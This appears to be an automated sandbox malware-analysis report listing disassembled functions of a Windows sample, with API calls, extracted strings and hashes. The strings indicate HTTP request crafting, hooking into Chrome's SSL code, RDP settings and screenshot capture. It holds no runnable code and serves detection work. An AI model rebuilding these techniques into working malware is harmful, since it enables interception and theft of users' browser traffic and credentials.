                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: AllocVirtual$HandleLibraryLoadModule_beginthreadex_endthreadexmemset
                                                                                                                                                                                                                                                                                            • String ID: -nogui$Cn@$\settings.rdp$\settings3.bin
                                                                                                                                                                                                                                                                                            • API String ID: 2388428757-2030277181
                                                                                                                                                                                                                                                                                            • Opcode ID: f08ba4c1bfcddca5860970e3d8ed7492dd9724e3b6700796bcda73e855b6c632
                                                                                                                                                                                                                                                                                            • Instruction ID: 04d713010f84b04d8a14b19830c6c0211c9473c0c386c6472beaf5e9da5b9fb7
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f08ba4c1bfcddca5860970e3d8ed7492dd9724e3b6700796bcda73e855b6c632
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5431E6B2804208BEEB007BB2DC46D9E7B68EF44314F11443FF554761C2EBBD596086AD
                                                                                                                                                                                                                                                                                            Function 00408041 Relevance: 10.6, APIs: 7, Instructions: 105stringCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: _wcsicmpwcscat$lstrcatwcscpy
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 496261138-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 0ff2d4684aeb4d074380ca8740ff74456deb645bc0d27a3e7455dd289190ab97
                                                                                                                                                                                                                                                                                            • Instruction ID: 35d462b374fbdc36f5f3da2ddc899513784a7a93d8508133af1dc08075530e9b
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0ff2d4684aeb4d074380ca8740ff74456deb645bc0d27a3e7455dd289190ab97
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 59318532500209EFDB14AF64DD899AB77B8EF44354F10447EF885F61D0EB389952DB98
                                                                                                                                                                                                                                                                                            Function 00404990 Relevance: 10.5, APIs: 4, Strings: 3, Instructions: 29stringCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • strlen.MSVCRT ref: 0040499A
                                                                                                                                                                                                                                                                                            • StrCmpNA.SHLWAPI(?,POST,00000000), ref: 004049A6
                                                                                                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,content-length: ), ref: 004049BE
                                                                                                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,Host: ), ref: 004049CC
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: strlen
                                                                                                                                                                                                                                                                                            • String ID: Host: $POST$content-length:
                                                                                                                                                                                                                                                                                            • API String ID: 39653677-1042216372
                                                                                                                                                                                                                                                                                            • Opcode ID: ddc6d14d3c1df5b068e88612f82facdd4d0dcb2df7500a7662d94c7f20301dab
                                                                                                                                                                                                                                                                                            • Instruction ID: d5a4c767ce580ea6c1601e266662ee61187f5ff5f5cbd4b0533a35ef7b913b7b
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ddc6d14d3c1df5b068e88612f82facdd4d0dcb2df7500a7662d94c7f20301dab
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: ADE09272101129FBCF001F61DD459AB3F5DDE417A03054173BD08B60A1DB799C215BEC
                                                                                                                                                                                                                                                                                            Function 00405FE6 Relevance: 9.2, APIs: 6, Instructions: 235COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ErrorLast
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1452528299-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 5844bf0b42851f5fe1c49cb1bc07bb877bcec552a78b92d61f8084f892e9533e
                                                                                                                                                                                                                                                                                            • Instruction ID: 66561430130293e26bb4315b1dc9932d2619224a750b5e19d140c42ffaa40899
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5844bf0b42851f5fe1c49cb1bc07bb877bcec552a78b92d61f8084f892e9533e
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F671D271600B01ABDB20EF65CD85A6677E4FF04304B11097EE946BB6C2DB7CE865CB98
                                                                                                                                                                                                                                                                                            Function 0040365D Relevance: 9.2, APIs: 6, Instructions: 192networkCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • memcpy.MSVCRT(00403A0B,?,00000400,00000000,00000000,00000000), ref: 00403683
                                                                                                                                                                                                                                                                                            • memmove.MSVCRT(?,?,?), ref: 0040369A
                                                                                                                                                                                                                                                                                            • recv.WS2_32(00000000,?,?,00000000), ref: 004036EF
                                                                                                                                                                                                                                                                                            • memcpy.MSVCRT(00403A0B,?,?), ref: 004037D1
                                                                                                                                                                                                                                                                                            • memcpy.MSVCRT(?,?,?), ref: 00403802
                                                                                                                                                                                                                                                                                            • memmove.MSVCRT(?,?,?), ref: 0040381F
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: memcpy$memmove$recv
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1228038989-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 9fdc5e6779b14a0df1a9da6607dacebbdd634f9f373cc919025bba962f8f083a
                                                                                                                                                                                                                                                                                            • Instruction ID: 4733277ae43c97108f76b87525d05f9215ac1b9e1a64921db7a6efb0c1656be0
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9fdc5e6779b14a0df1a9da6607dacebbdd634f9f373cc919025bba962f8f083a
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 23717EB1900604DFCB20DF69C88486EBBF9FF48311B148A3AE106E7790D375AA45CF58
                                                                                                                                                                                                                                                                                            Function 00404533 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404B40: VirtualAlloc.KERNEL32(00000000,00000109,00003000,00000004,?,?,0040411D,?), ref: 00404B51
                                                                                                                                                                                                                                                                                            • sscanf.MSVCRT ref: 004045B4
                                                                                                                                                                                                                                                                                            • memset.MSVCRT ref: 004045D6
                                                                                                                                                                                                                                                                                            • _beginthreadex.MSVCRT ref: 0040461C
                                                                                                                                                                                                                                                                                            • _endthreadex.MSVCRT(00000000), ref: 00404689
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: AllocVirtual_beginthreadex_endthreadexmemsetsscanf
                                                                                                                                                                                                                                                                                            • String ID: %[^:]:%d
                                                                                                                                                                                                                                                                                            • API String ID: 2100783065-2596537641
                                                                                                                                                                                                                                                                                            • Opcode ID: d106942efc362f28b20d0a1f4ea3198db88ca4f8ee9609d88d352717e9177508
                                                                                                                                                                                                                                                                                            • Instruction ID: caad7c37abe64e26d345493b623ba54f3f47d27cd44cb584ac9290b12886452c
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d106942efc362f28b20d0a1f4ea3198db88ca4f8ee9609d88d352717e9177508
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C831D3B14083006FD711AB70DC459AF77D8EBC9318F000A3EF5D4B61C2E77D9A0986AA
                                                                                                                                                                                                                                                                                            Function 0040A2C1 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 110libraryloaderCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(ntdll.dll), ref: 0040A2D7
                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,sprintf), ref: 0040A2EE
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            • sprintf, xrefs: 0040A2E8
                                                                                                                                                                                                                                                                                            • GET %s HTTP/1.0Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0Host: %sConnection: Close, xrefs: 0040A35D
                                                                                                                                                                                                                                                                                            • ntdll.dll, xrefs: 0040A2D2
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                                                                            • String ID: GET %s HTTP/1.0Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0Host: %sConnection: Close$ntdll.dll$sprintf
                                                                                                                                                                                                                                                                                            • API String ID: 1646373207-4199336446
                                                                                                                                                                                                                                                                                            • Opcode ID: 6720225d473a3e7a8ee91ae3df4023a30a0bfe42256af2c2cb6c7d85ffd16130
                                                                                                                                                                                                                                                                                            • Instruction ID: 5706cbf925bcad4f2458c19b8b1a726a5bc2f2d2b8a8cdd233c6fc7e23382b0f
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6720225d473a3e7a8ee91ae3df4023a30a0bfe42256af2c2cb6c7d85ffd16130
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C431C171D04308BAEF11ABA5DC86BEF7B789F00355F1040AAF901752C2D77D5A58876A
                                                                                                                                                                                                                                                                                            Function 0040A1D2 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 93libraryloaderCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(ntdll.dll,?,00001B7C,00000000,?,004095E8,?,?), ref: 0040A1EB
                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,sprintf), ref: 0040A202
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            • sprintf, xrefs: 0040A1FC
                                                                                                                                                                                                                                                                                            • GET %s HTTP/1.0Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0Host: %sConnection: Close, xrefs: 0040A25E
                                                                                                                                                                                                                                                                                            • ntdll.dll, xrefs: 0040A1DD
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                                                                            • String ID: GET %s HTTP/1.0Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0Host: %sConnection: Close$ntdll.dll$sprintf
                                                                                                                                                                                                                                                                                            • API String ID: 1646373207-4199336446
                                                                                                                                                                                                                                                                                            • Opcode ID: 27c25b0c12fef8fd976663cf04e7778861f518e198658df327bd3485b55de72b
                                                                                                                                                                                                                                                                                            • Instruction ID: b6be74e1b03e75479ef87858cb4f51a505419649f5c342e01217e15b57cc1ad0
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 27c25b0c12fef8fd976663cf04e7778861f518e198658df327bd3485b55de72b
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9831AD71D00308BFDB00AFA5CC859EFBB78EF44354F1040BAF901B6281D7398A498BA9
                                                                                                                                                                                                                                                                                            Function 00407659 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85processCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • memset.MSVCRT ref: 0040767A
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404C49: VirtualAlloc.KERNELBASE(00000000,00003000,00003000,00000004,?,00407953,?), ref: 00404C66
                                                                                                                                                                                                                                                                                            • CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000028,00000000,00000000,00000044,?), ref: 004076EB
                                                                                                                                                                                                                                                                                            • GetExitCodeProcess.KERNEL32(?,?), ref: 004076FF
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Process$AllocCodeCreateExitVirtualmemset
                                                                                                                                                                                                                                                                                            • String ID: %s %s$D
                                                                                                                                                                                                                                                                                            • API String ID: 2626342938-228357124
                                                                                                                                                                                                                                                                                            • Opcode ID: 44bfef4738790ae1014216102cee146de85259c7ed07b8a908ffe24cc37b47c9
                                                                                                                                                                                                                                                                                            • Instruction ID: 6b5b47374330eb9bbcb85e4d4971d62087e494d4f52310435c6f5cf2edc44698
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 44bfef4738790ae1014216102cee146de85259c7ed07b8a908ffe24cc37b47c9
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A721A1B590020CBAEF10ABE8CD85EEF777CAB40788F104536F605B61D1D6799E04876A
                                                                                                                                                                                                                                                                                            Function 00406A6D Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 79COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(chrome.dll), ref: 00406AFC
                                                                                                                                                                                                                                                                                            • memcmp.MSVCRT(c:\b\build\slave\win\build\src\third_party\boringssl\src\ssl\ssl_lib.c,?,00000047), ref: 00406B5F
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: HandleModulememcmp
                                                                                                                                                                                                                                                                                            • String ID: .rdata$c:\b\build\slave\win\build\src\third_party\boringssl\src\ssl\ssl_lib.c$chrome.dll
                                                                                                                                                                                                                                                                                            • API String ID: 3989855111-1570250894
                                                                                                                                                                                                                                                                                            • Opcode ID: 5e56d06232fbb1c31dc4d683aec6f660aea5883495f16a40cced8092f123dd94
                                                                                                                                                                                                                                                                                            • Instruction ID: 2881bae018a64d072246813a1eeff09cffba2de491337b68aaedce54ad982370
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5e56d06232fbb1c31dc4d683aec6f660aea5883495f16a40cced8092f123dd94
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D3315AB0D0025AEBCB10DFD5CA817ADBBB0FF04714F114069D819BB245E734AA55CB98
                                                                                                                                                                                                                                                                                            Function 00408EDA Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 66COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 00408EF1
                                                                                                                                                                                                                                                                                            • GdipGetImageEncoders.GDIPLUS(?,?,00000000), ref: 00408F18
                                                                                                                                                                                                                                                                                            • wcscmp.MSVCRT ref: 00408F30
                                                                                                                                                                                                                                                                                            • free.MSVCRT ref: 00408F4B
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: EncodersGdipImage$Sizefreewcscmp
                                                                                                                                                                                                                                                                                            • String ID: image/jpeg
                                                                                                                                                                                                                                                                                            • API String ID: 1889944190-3785015651
                                                                                                                                                                                                                                                                                            • Opcode ID: 6d15e256acb539afc9f5a56b8e73055e00082a904beecfb1656cccc4f0301ed5
                                                                                                                                                                                                                                                                                            • Instruction ID: 6bdb5e7b763721adc0850e09ae39b457867aa65e877056b428b3a166b53218b9
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6d15e256acb539afc9f5a56b8e73055e00082a904beecfb1656cccc4f0301ed5
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 61116072C04119FBCB11EFA5DE8048EBBB9FF04760B2142ABF951B7191CB759E408B98
                                                                                                                                                                                                                                                                                            Function 0040914C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 64COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404C49: VirtualAlloc.KERNELBASE(00000000,00003000,00003000,00000004,?,00407953,?), ref: 00404C66
                                                                                                                                                                                                                                                                                            • wcslen.MSVCRT ref: 0040917C
                                                                                                                                                                                                                                                                                            • wsprintfW.USER32 ref: 0040919A
                                                                                                                                                                                                                                                                                            • memset.MSVCRT ref: 004091AA
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: AllocVirtualmemsetwcslenwsprintf
                                                                                                                                                                                                                                                                                            • String ID: %ls %ls$D
                                                                                                                                                                                                                                                                                            • API String ID: 3399112775-3711497183
                                                                                                                                                                                                                                                                                            • Opcode ID: 64437f8ea30d7b2b895be350631d7234ab4844f8bfdfe3bf62bdf63a45208b5e
                                                                                                                                                                                                                                                                                            • Instruction ID: 0f71edebdb05571a7afb2cc771484d0f1e207efa235fb498652b322763e6f6ab
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 64437f8ea30d7b2b895be350631d7234ab4844f8bfdfe3bf62bdf63a45208b5e
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6411A0B1505218BFEF106BB1DD4AEDF7F68DF04399F104026FA04B61C2D6798A108AA8
                                                                                                                                                                                                                                                                                            Function 0040566A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • LoadLibraryW.KERNEL32(dnsapi), ref: 00405673
                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,DnsFlushResolverCache), ref: 00405689
                                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 0040569D
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                                                            • String ID: DnsFlushResolverCache$dnsapi
                                                                                                                                                                                                                                                                                            • API String ID: 145871493-2696141711
                                                                                                                                                                                                                                                                                            • Opcode ID: 36b9477244243fc65d3aed68ef795c1633e24aa1a68dec2a880403fe4b67ade2
                                                                                                                                                                                                                                                                                            • Instruction ID: de47a484c9a4c01348ab34ff2fa1ca69ed6d1f64397dde5c026b61f6f0ba081a
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 36b9477244243fc65d3aed68ef795c1633e24aa1a68dec2a880403fe4b67ade2
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 27E04822241A22D6D62117665D896AF1659DEC17613424636E819F32C09B3D884298AD
                                                                                                                                                                                                                                                                                            Function 0040740F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26libraryloaderCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,004079E1,8EB39475,?), ref: 00407421
                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 00407428
                                                                                                                                                                                                                                                                                            • IsWow64Process.KERNEL32(00000000,00000000,?,?,004079E1,8EB39475,?), ref: 0040744C
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: AddressHandleModuleProcProcessWow64
                                                                                                                                                                                                                                                                                            • String ID: IsWow64Process$kernel32
                                                                                                                                                                                                                                                                                            • API String ID: 1818662866-3789238822
                                                                                                                                                                                                                                                                                            • Opcode ID: 79b819af46dbac8717e3d531836bc8e78bcd7ba50d740ae358c9fc3078a08f27
                                                                                                                                                                                                                                                                                            • Instruction ID: e90818c18119c4b815425817d2e774f9f44224c08fcb8d73207bfa4cc81b1f04
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 79b819af46dbac8717e3d531836bc8e78bcd7ba50d740ae358c9fc3078a08f27
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0AE09275401302EFDB00A7F0DC0EB9E3668AB40759F20463AB402F20C0DBBCEA00C66D
                                                                                                                                                                                                                                                                                            Function 0040315A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 25libraryloaderCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • LoadLibraryW.KERNEL32(schannel.dll,00403AE1,00000000,00000000,?,?,?,00408E96,?,00407F38,00000000,00000000), ref: 00403168
                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,InitSecurityInterfaceA), ref: 00403180
                                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(?,?,?,00408E96,?,00407F38,00000000,00000000), ref: 004031A0
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                                                            • String ID: InitSecurityInterfaceA$schannel.dll
                                                                                                                                                                                                                                                                                            • API String ID: 145871493-268872944
                                                                                                                                                                                                                                                                                            • Opcode ID: d1a1427068a8ae5bee01f45136ef7aa65b318e81bffd8f28bc1104f3795ff721
                                                                                                                                                                                                                                                                                            • Instruction ID: 131af09ec97f5aab2ee22765e42e2a7ba2b6d34ce762315e39935cec4ccd5fa5
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d1a1427068a8ae5bee01f45136ef7aa65b318e81bffd8f28bc1104f3795ff721
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 04F06D30652281CEE7115FB0EE4C7963BADA70430BF108136A005F92E2DBBC9199DA1E
                                                                                                                                                                                                                                                                                            Function 0040A990 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404B40: VirtualAlloc.KERNEL32(00000000,00000109,00003000,00000004,?,?,0040411D,?), ref: 00404B51
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404C49: VirtualAlloc.KERNELBASE(00000000,00003000,00003000,00000004,?,00407953,?), ref: 00404C66
                                                                                                                                                                                                                                                                                            • sprintf.MSVCRT ref: 0040A9E8
                                                                                                                                                                                                                                                                                            • sprintf.MSVCRT ref: 0040AA00
                                                                                                                                                                                                                                                                                            • _endthreadex.MSVCRT(00000000), ref: 0040AA63
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: AllocVirtualsprintf$_endthreadex
                                                                                                                                                                                                                                                                                            • String ID: %s %s
                                                                                                                                                                                                                                                                                            • API String ID: 2621873700-2939940506
                                                                                                                                                                                                                                                                                            • Opcode ID: 7a3023b5390878df82cb68fce8d5178a49c938cdd1e1d6fa6e766aa37eeba27b
                                                                                                                                                                                                                                                                                            • Instruction ID: 25ce27bdb26a5dd991821e42614bac8864a3014263b9c74c023817e95a20eb2c
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7a3023b5390878df82cb68fce8d5178a49c938cdd1e1d6fa6e766aa37eeba27b
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E821F571504208FFEF11AF64DD46B9D3BA4EF44308F11447AF9047A2C2DBBD5A90DAAA
